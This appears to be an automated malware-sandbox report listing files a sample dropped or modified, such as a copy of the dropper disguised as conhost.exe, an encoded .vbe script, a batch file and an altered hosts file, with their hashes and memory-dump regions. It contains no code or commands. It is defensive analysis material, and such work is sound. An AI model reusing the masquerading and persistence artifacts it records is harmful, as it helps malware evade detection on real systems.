C:\Users\Admin\AppData\Local\Temp\locemsecurity.exe
Filesize
4.0MB

MD5
7b9e14ff7002ae1cd4379d4e0bd92328

SHA1
dacf6c92c7caa03e64fa15870835aa3c8c9f3797

SHA256
d612dc0be127db5013bfc7c8310e8c27c2b4f738d44e1c6222c7bcd4baece8fe

SHA512
a30cd27bb6a00a5ba868eb39dde1e2005b6517f911a28cf553b51f789d6204102f2f6f4fa8d55cf130ac72c5dd235828079b45c535793fffe2108aad2c52ca60

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
2KB

MD5
8183f94d84c2c7e52df6412dc77748eb

SHA1
56fd5ae067d034f2ea0fc79274e62dbe1760ee0c

SHA256
75900e1cc07da2daf2f9f2da3a67d594e575d1d3c2d2410fe24d54aa1b228ea8

SHA512
7c4c9d3b6d928a08c0acc117fe09e5df6ba4ceeffd959c85587c95739c5660f191a2758c9823a9155be38173397f10951c7d0d23c09e413d899991814e1acd0a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
811d351aabd7b708fef7683cf5e29e15

SHA1
06fd89e5a575f45d411cf4b3a2d277e642e73dbb

SHA256
0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

SHA512
702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
302a7c179ef577c237c5418fb770fd27

SHA1
343ef00d1357a8d2ff6e1143541a8a29435ed30c

SHA256
9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

SHA512
f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
8183f94d84c2c7e52df6412dc77748eb

SHA1
56fd5ae067d034f2ea0fc79274e62dbe1760ee0c

SHA256
75900e1cc07da2daf2f9f2da3a67d594e575d1d3c2d2410fe24d54aa1b228ea8

SHA512
7c4c9d3b6d928a08c0acc117fe09e5df6ba4ceeffd959c85587c95739c5660f191a2758c9823a9155be38173397f10951c7d0d23c09e413d899991814e1acd0a

Download Submit
C:\hypersavesIntoRuntime\kwfdnN25sFO9XG48EjXTqioFlqF9.vbe
Filesize
211B

MD5
43183dd14e863071de40b6e12d3f0d3c

SHA1
c4d84b4bd91b4c91c305ccd3815d6b07f95cf9ff

SHA256
283fd9f8112720fadcf42c088a57ec8ac30cfda2ac23cf8a02ec78e16286b037

SHA512
796630c88bd0ef95bd9dc5624f519c127db989d738c00538144adbe9421f35703fa91f44a4d460dd1033848d67f44c5fd58aea70df45ee8da8b5105bc2e9bea4

Download Submit
C:\hypersavesIntoRuntime\savesinto.exe
Filesize
1.7MB

MD5
11bcd2c674e9c7866a509ba1d7c73208

SHA1
43c9ac90f38bfbfae5eed37c6e7f804ca25d997f

SHA256
8ccbbdb929631a53fb132b67ab2378b498eb192d68d1091b50a138279b432801

SHA512
1f61bf5bc71c7567336c4e229f62d78a56a428bd07692f791940abfdff30a70e521ae5d26ca231f7e7cb516a50f3c0defbabb4859e0caaf4bf6fe1ddacd82c1d

Download Submit
C:\hypersavesIntoRuntime\savesinto.exe
Filesize
1.7MB

MD5
11bcd2c674e9c7866a509ba1d7c73208

SHA1
43c9ac90f38bfbfae5eed37c6e7f804ca25d997f

SHA256
8ccbbdb929631a53fb132b67ab2378b498eb192d68d1091b50a138279b432801

SHA512
1f61bf5bc71c7567336c4e229f62d78a56a428bd07692f791940abfdff30a70e521ae5d26ca231f7e7cb516a50f3c0defbabb4859e0caaf4bf6fe1ddacd82c1d

Download Submit
C:\hypersavesIntoRuntime\xWSvEstqqDAQFrAa.bat
Filesize
40B

MD5
77d55137901348fe9db620bba96dce04

SHA1
3ae6bd9fd68ebab445706478fbd2366fe62c6861

SHA256
98c528c1ee001ae918d91b0b4d387d6daebd8b75bc75a1cc1cdb7a5e9fe73ce3

SHA512
d5c2ed17dceef6d599b06afcef86bce080192ec16c9350405c895db79f5d04a718460427bbe63276a0a2cf4e5904424bdff291baa94b8d6ac3bd07b17c7b2205

Download Submit
C:\odt\conhost.exe
Filesize
1.7MB

MD5
11bcd2c674e9c7866a509ba1d7c73208

SHA1
43c9ac90f38bfbfae5eed37c6e7f804ca25d997f

SHA256
8ccbbdb929631a53fb132b67ab2378b498eb192d68d1091b50a138279b432801

SHA512
1f61bf5bc71c7567336c4e229f62d78a56a428bd07692f791940abfdff30a70e521ae5d26ca231f7e7cb516a50f3c0defbabb4859e0caaf4bf6fe1ddacd82c1d

Download Submit
C:\odt\conhost.exe
Filesize
1.7MB

MD5
11bcd2c674e9c7866a509ba1d7c73208

SHA1
43c9ac90f38bfbfae5eed37c6e7f804ca25d997f

SHA256
8ccbbdb929631a53fb132b67ab2378b498eb192d68d1091b50a138279b432801

SHA512
1f61bf5bc71c7567336c4e229f62d78a56a428bd07692f791940abfdff30a70e521ae5d26ca231f7e7cb516a50f3c0defbabb4859e0caaf4bf6fe1ddacd82c1d

Download Submit
memory/328-120-0x00000000006E0000-0x000000000070E000-memory.dmp

Filesize
184KB

Download
memory/652-377-0x0000000000000000-mapping.dmp

Download
memory/668-1390-0x00007FF74DE814E0-mapping.dmp

Download
memory/924-1130-0x0000000000000000-mapping.dmp

Download
memory/1016-1121-0x0000000000000000-mapping.dmp

Download
memory/1056-1111-0x0000000000000000-mapping.dmp

Download
memory/1096-400-0x0000000000000000-mapping.dmp

Download
memory/1284-1395-0x0000000000000000-mapping.dmp

Download
memory/1324-513-0x0000000000000000-mapping.dmp

Download
memory/1324-444-0x0000000000000000-mapping.dmp

Download
memory/1344-378-0x0000000000000000-mapping.dmp

Download
memory/1512-411-0x0000000000000000-mapping.dmp

Download
memory/1532-273-0x0000000000000000-mapping.dmp

Download
memory/1536-395-0x0000000000000000-mapping.dmp

Download
memory/1576-980-0x0000023A51410000-0x0000023A5142C000-memory.dmp

Filesize
112KB

Download
memory/1576-986-0x0000023A515D0000-0x0000023A51689000-memory.dmp

Filesize
740KB

Download
memory/1576-1019-0x0000023A51430000-0x0000023A5143A000-memory.dmp

Filesize
40KB

Download
memory/1576-830-0x0000000000000000-mapping.dmp

Download
memory/1748-500-0x0000000000000000-mapping.dmp

Download
memory/2012-420-0x0000000000000000-mapping.dmp

Download
memory/2064-1137-0x0000000000000000-mapping.dmp

Download
memory/2076-1403-0x00007FF6A5910000-0x00007FF6A6104000-memory.dmp

Filesize
8.0MB

Download
memory/2076-1406-0x0000020592740000-0x0000020592760000-memory.dmp

Filesize
128KB

Download
memory/2076-1399-0x00007FF6A61025D0-mapping.dmp

Download
memory/2076-1405-0x00007FF6A5910000-0x00007FF6A6104000-memory.dmp

Filesize
8.0MB

Download
memory/2076-1404-0x0000020591FA0000-0x0000020591FE0000-memory.dmp

Filesize
256KB

Download
memory/2076-1407-0x0000020592740000-0x0000020592760000-memory.dmp

Filesize
128KB

Download
memory/2128-214-0x0000000000000000-mapping.dmp

Download
memory/2164-379-0x0000000000000000-mapping.dmp

Download
memory/2420-509-0x0000000000000000-mapping.dmp

Download
memory/2512-1131-0x0000000000000000-mapping.dmp

Download
memory/2688-387-0x0000000000000000-mapping.dmp

Download
memory/2708-1108-0x0000000000000000-mapping.dmp

Download
memory/2768-540-0x0000000000000000-mapping.dmp

Download
memory/2876-510-0x0000000000000000-mapping.dmp

Download
memory/3016-522-0x0000000000000000-mapping.dmp

Download
memory/3016-470-0x0000000000000000-mapping.dmp

Download
memory/3316-504-0x0000000000000000-mapping.dmp

Download
memory/3536-442-0x0000000000000000-mapping.dmp

Download
memory/3544-519-0x0000000000000000-mapping.dmp

Download
memory/3604-1129-0x0000000000000000-mapping.dmp

Download
memory/3676-1112-0x0000000000000000-mapping.dmp

Download
memory/3728-256-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-241-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-272-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-209-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-213-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-215-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-222-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-224-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-226-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-1107-0x0000000000000000-mapping.dmp

Download
memory/3728-229-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-284-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-232-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-233-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-235-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-275-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-237-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-238-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-240-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-243-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-245-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-246-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-247-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-244-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-242-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-248-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-249-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-239-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-236-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-234-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-274-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-271-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-231-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-270-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-268-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-269-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-267-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-230-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-266-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-250-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-265-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-228-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-264-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-262-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-205-0x0000000000000000-mapping.dmp

Download
memory/3728-251-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-227-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-252-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-225-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-253-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-260-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-261-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-211-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-218-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-259-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-254-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-258-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-255-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3728-257-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3796-121-0x0000000000000000-mapping.dmp

Download
memory/3796-127-0x00000242B21A0000-0x00000242B21C2000-memory.dmp

Filesize
136KB

Download
memory/3796-132-0x00000242CC4E0000-0x00000242CC556000-memory.dmp

Filesize
472KB

Download
memory/3844-1124-0x0000000000000000-mapping.dmp

Download
memory/3860-505-0x0000000000000000-mapping.dmp

Download
memory/3868-290-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3868-285-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3868-286-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3868-283-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3868-278-0x0000000000000000-mapping.dmp

Download
memory/3868-287-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3868-289-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3868-282-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/3980-143-0x0000000000000000-mapping.dmp

Download
memory/3992-1122-0x0000000000000000-mapping.dmp

Download
memory/4056-507-0x0000000000000000-mapping.dmp

Download
memory/4092-458-0x0000000000000000-mapping.dmp

Download
memory/4092-1119-0x0000000000000000-mapping.dmp

Download
memory/4128-508-0x0000000000000000-mapping.dmp

Download
memory/4176-413-0x0000000000000000-mapping.dmp

Download
memory/4184-447-0x0000000000000000-mapping.dmp

Download
memory/4228-516-0x0000000000000000-mapping.dmp

Download
memory/4252-394-0x0000000000000000-mapping.dmp

Download
memory/4280-437-0x0000000000000000-mapping.dmp

Download
memory/4364-417-0x0000000000000000-mapping.dmp

Download
memory/4464-1134-0x0000000000000000-mapping.dmp

Download
memory/4532-1128-0x0000000000000000-mapping.dmp

Download
memory/4612-1393-0x0000000000000000-mapping.dmp

Download
memory/4684-1133-0x0000000000000000-mapping.dmp

Download
memory/4720-428-0x0000000000000000-mapping.dmp

Download
memory/4736-539-0x000000001BA89000-0x000000001BA8F000-memory.dmp

Filesize
24KB

Download
memory/4736-575-0x000000001BA89000-0x000000001BA8F000-memory.dmp

Filesize
24KB

Download
memory/4736-462-0x0000000002DB0000-0x0000000002DC2000-memory.dmp

Filesize
72KB

Download
memory/4736-455-0x0000000002DE0000-0x0000000002E30000-memory.dmp

Filesize
320KB

Download
memory/4736-440-0x0000000000B60000-0x0000000000D1A000-memory.dmp

Filesize
1.7MB

Download
memory/4736-469-0x0000000002DC0000-0x0000000002DCC000-memory.dmp

Filesize
48KB

Download
memory/4736-471-0x0000000002DD0000-0x0000000002DD8000-memory.dmp

Filesize
32KB

Download
memory/4736-452-0x0000000001650000-0x000000000166C000-memory.dmp

Filesize
112KB

Download
memory/4736-473-0x000000001B930000-0x000000001B942000-memory.dmp

Filesize
72KB

Download
memory/4736-474-0x000000001C6C0000-0x000000001CBE6000-memory.dmp

Filesize
5.1MB

Download
memory/4736-475-0x000000001B940000-0x000000001B94C000-memory.dmp

Filesize
48KB

Download
memory/4736-476-0x000000001BF90000-0x000000001BF9C000-memory.dmp

Filesize
48KB

Download
memory/4736-459-0x0000000002D90000-0x0000000002DA6000-memory.dmp

Filesize
88KB

Download
memory/4736-477-0x000000001BFB0000-0x000000001BFBA000-memory.dmp

Filesize
40KB

Download
memory/4736-479-0x000000001BFD0000-0x000000001BFDC000-memory.dmp

Filesize
48KB

Download
memory/4736-480-0x000000001BFE0000-0x000000001BFEC000-memory.dmp

Filesize
48KB

Download
memory/4736-468-0x0000000002E30000-0x0000000002E40000-memory.dmp

Filesize
64KB

Download
memory/4736-478-0x000000001BFC0000-0x000000001BFC8000-memory.dmp

Filesize
32KB

Download
memory/4736-434-0x0000000000000000-mapping.dmp

Download
memory/4736-456-0x0000000001270000-0x0000000001278000-memory.dmp

Filesize
32KB

Download
memory/4888-1132-0x0000000000000000-mapping.dmp

Download
memory/5012-1396-0x0000000000000000-mapping.dmp

Download
memory/5044-503-0x0000000000000000-mapping.dmp

Download
memory/5048-1110-0x0000000000000000-mapping.dmp

Download
memory/5048-1359-0x000002B9A3DA0000-0x000002B9A3DBC000-memory.dmp

Filesize
112KB

Download
memory/5072-483-0x0000000000000000-mapping.dmp

Download
memory/5108-506-0x0000000000000000-mapping.dmp

Download
memory/5112-511-0x0000000000000000-mapping.dmp

Download